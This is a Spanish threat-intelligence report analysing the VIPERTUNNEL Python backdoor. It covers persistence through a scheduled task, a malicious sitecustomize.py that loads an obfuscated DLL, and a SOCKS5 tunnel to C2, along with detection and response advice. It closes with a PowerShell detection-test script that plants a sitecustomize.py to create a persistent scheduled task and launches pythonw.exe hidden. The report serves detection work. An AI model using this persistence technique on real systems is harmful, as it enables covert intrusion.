VIPERTUNNEL, un backdoor en Python: Un análisis profundo

Ruslan Mikhalov Jefe de Investigación de Amenazas en SOC Prime

Seguir

VIPERTUNNEL, un backdoor en Python: Un análisis profundo

Detection stack

AIDR
Alert
ETL
Query

Informe de Amenazas
Flujo de Ataque
Detecciones
Simulaciones

Resumen

El informe detalla el análisis de VIPERTUNNEL, un backdoor basado en Python que logra persistencia a través de una tarea programada y aprovecha un sitecustomize.py malicioso para cargar un DLL ofuscado. El DLL descifra y ejecuta una carga útil de múltiples etapas que establece un proxy SOCKS5 a un servidor C2 codificado en dureza sobre el puerto 443. La infraestructura está vinculada a UNC2165 y EvilCorp y comparte técnicas de ofuscación con el ladrón de credenciales ShadowCoil.

Investigación

Los investigadores examinaron la salida de Autoruns, identificaron la tarea programada 523135538 y rastrearon la ejecución a C:ProgramDatacp49spythonw.exe y su módulo sitecustomize.py. La ingeniería inversa del b5yogiiy3c.dll reveló ofuscación por capas, rutinas de descifrado y una etapa final que crea un túnel SOCKS5 usando credenciales codificadas en dureza. El análisis de infraestructura vinculó múltiples dominios e IPs a la campaña y destacó el uso del marco Pyramid C2.

Mitigación

Despliegue detección en el endpoint que monitoree la ejecución de pythonw.exe sin argumentos, creación de tareas programadas con nombres numéricos y la presencia de sitecustomize.py en ubicaciones inesperadas. Bloquee el tráfico saliente hacia dominios C2 conocidos y puertos 443/8000 con respuestas HTTP 401 anómalas. Implemente un control estricto de aplicaciones para evitar la carga de módulos de Python no autorizados.

Respuesta

Alerta sobre la creación de la tarea programada sospechosa y la ejecución de pythonw.exe sin un script. Ponga en cuarentena los hosts afectados, recolecte volcados de memoria y busque los nombres de clase característicos y credenciales codificadas en dureza. Invalide las credenciales comprometidas y rompa la infraestructura C2 identificada en el informe.

"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef process fill:#c2f0c2 classDef tool fill:#ffeb99 classDef file fill:#d9d9d9 classDef component fill:#cce5ff classDef c2 fill:#f4b084 classDef credential fill:#ffe6e6 %% Technique nodes tech_persistence["Technique – T1053.005 Tarea Programada : Persistencia Description: Crea o modifica una tarea programada para ejecutar código malicioso al inicio del sistema o en un horario."] class tech_persistence technique tech_obfuscation["Technique – T1027 Archivos o Información Ofuscados Description: Usa codificación, compresión y primitivas criptográficas para ocultar código malicioso."] class tech_obfuscation technique tech_deobfuscate["Technique – T1140 Desofuscar/Decodificar Archivos o Información Description: Decodifica Base85 y otras transformaciones para recuperar código de la siguiente etapa."] class tech_deobfuscate technique tech_compile["Technique – T1027.004 Compilar Después de la Entrega Description: Compila código recuperado en memoria usando compile() y exec()."] class tech_compile technique tech_reflect["Technique – T1620 Carga Reflexiva de Código Description: Carga y ejecuta código directamente desde la memoria sin escribir en el disco."] class tech_reflect technique tech_proxy_ext["Technique – T1090.002 Proxy Externo Description: Establece un proxy externo SOCKS5 para reenviar tráfico."] class tech_proxy_ext technique tech_proxy_int["Technique – T1090.001 Proxy Interno Description: Usa componentes de proxy interno para retransmitir tráfico."] class tech_proxy_int technique tech_tunnel["Technique – T1572 Tunelización de Protocolo Description: Encapsula tráfico de la víctima dentro del túnel SOCKS5."] class tech_tunnel technique tech_encrypted["Technique – T1573 Canal Encriptado Description: Encripta comunicación C2 con ChaCha20/XOR."] class tech_encrypted technique tech_webc2["Technique – T1102 Servicio Web Description: Se comunica con C2 a través de HTTPS usando servicio Pyramid personalizado."] class tech_webc2 technique tech_nonstd["Technique – T1571 Puerto No Estándar Description: Usa el puerto 443 para mezclarse con el tráfico HTTPS legítimo."] class tech_nonstd technique %% Process and tool nodes process_task["Proceso – Tarea Programada 523135538 Comando: C:ProgramDatacp49spythonw.exe"] class process_task process tool_pythonw["Herramienta – pythonw.exe Rol: Ejecuta scripts de Python sin una ventana de consola."] class tool_pythonw tool %% File nodes file_sitecustomize["Archivo – sitecustomize.py Propósito: Importaciones automáticas y desencadena la ejecución del DLL."] class file_sitecustomize file file_dll["Archivo – b5yogiiy3c.dll Tipo: Carga útil de Python ofuscada."] class file_dll file %% Component nodes component_wire["Componente – Clase Wire Función: Implementa cliente SOCKS5."] class component_wire component component_relay["Componente – Clase Relay Función: Gestiona el reenvío de tráfico."] class component_relay component component_commander["Componente – Clase Commander Función: Maneja comandos C2."] class component_commander component %% C2 and credential nodes c2_server["Servidor C2 – Servicio Pyramid Respuesta: HTTP 401 Basic realm=Proxy"] class c2_server c2 credentials["Credenciales – AnyUser / AnyPassword Uso: Autentica con proxy."] class credentials credential %% Connections tech_persistence –>|crea| process_task process_task –>|lanza| tool_pythonw tool_pythonw –>|importa| file_sitecustomize file_sitecustomize –>|carga| file_dll file_dll –>|usa| tech_obfuscation file_dll –>|desencadena| tech_deobfuscate tech_deobfuscate –>|conduce a| tech_compile tech_compile –>|conduce a| tech_reflect tech_reflect –>|ejecuta| component_wire component_wire –>|trabaja con| component_relay component_relay –>|controla| component_commander component_commander –>|contacta| c2_server c2_server –>|usa| tech_proxy_ext c2_server –>|usa| tech_proxy_int c2_server –>|canaliza a través de| tech_tunnel c2_server –>|encripta canal| tech_encrypted c2_server –>|se comunica a través de| tech_webc2 c2_server –>|usa puerto| tech_nonstd component_commander –>|autenticación con| credentials %% Apply classes class tech_persistence,tech_obfuscation,tech_deobfuscate,tech_compile,tech_reflect,tech_proxy_ext,tech_proxy_int,tech_tunnel,tech_encrypted,tech_webc2,tech_nonstd technique class process_task process class tool_pythonw tool class file_sitecustomize,file_dll file class component_wire,component_relay,component_commander component class c2_server c2 class credentials credential "

Flujo de Ataque

Narrativa de Ataque y Comandos:

El adversario primero coloca un sitecustomize.py malicioso en el mismo directorio que pythonw.exe. Python importa automáticamente sitecustomize.py al iniciar el intérprete, permitiendo al atacante ejecutar código arbitrario sin pasar una ruta de script en la línea de comandos. Al lanzar pythonw.exe sin argumentos, el evento de creación de procesos contiene una CommandLine vacía, satisfaciendo las condiciones de la regla Sigma. La carga útil establece una tarea programada para la persistencia, asegurando que el intérprete se ejecute al inicio del sistema, manteniendo así un punto de apoyo a largo plazo.

Script de Prueba de Regresión:

# -------------------------------------------------
# Configurar sitecustomize.py malicioso
# -------------------------------------------------
$payloadPath = 'C:ProgramDatacp49ssitecustomize.py'
$exePath     = 'C:ProgramDatacp49spythonw.exe'

# Asegurar que la carpeta objetivo exista
New-Item -ItemType Directory -Path (Split-Path $exePath) -Force | Out-Null

# Desplegar una copia benigna de pythonw.exe para la prueba (si no está presente)
# En un escenario real de equipo rojo, este sería el intérprete legítimo
if (-Not (Test-Path $exePath)) {
    # Copiar desde la instalación del sistema Python (ajustar la ruta según sea necesario)
    Copy-Item 'C:Python39pythonw.exe' $exePath
}

# Crear sitecustomize.py malicioso (crea una tarea programada como prueba de concepto)
@"
import subprocess, sys
# Crear una tarea programada que ejecute pythonw.exe cada minuto (persistencia)
subprocess.run(['schtasks', '/Create', '/SC', 'MINUTE', '/MO', '1',
            '/TN', 'UpdateTask', '/TR', sys.executable])
"@ | Set-Content -Path $payloadPath -Encoding UTF8

# -------------------------------------------------
# Desencadenar la detección (ejecución maliciosa)
# -------------------------------------------------
Write-Host '[+] Lanzando pythonw.exe con línea de comandos vacía...'
Start-Process -FilePath $exePath -ArgumentList '' -WindowStyle Hidden

# Esperar un corto periodo para que se cree la tarea programada (opcional)
Start-Sleep -Seconds 5

Write-Host '[+] Carga útil ejecutada. Revisa tu SIEM para la alerta.'
# -------------------------------------------------
# Fin del script
# -------------------------------------------------

Comandos de Limpieza:

# Eliminar el sitecustomize.py malicioso
Remove-Item -Path 'C:ProgramDatacp49ssitecustomize.py' -Force -ErrorAction SilentlyContinue

# Eliminar la tarea programada creada por la carga útil
schtasks /Delete /TN UpdateTask /F

# Opcionalmente eliminar el pythonw.exe copiado (si era una copia de prueba)
# Remove-Item -Path 'C:ProgramDatacp49spythonw.exe' -Force

Write-Host '[+] Limpieza completa.'

Únete a la plataforma Detection as Code de SOC Prime para mejorar la visibilidad de las amenazas más relevantes para tu negocio. Para ayudarte a comenzar y obtener valor inmediato, programa una reunión ahora con los expertos de SOC Prime.

Únete gratis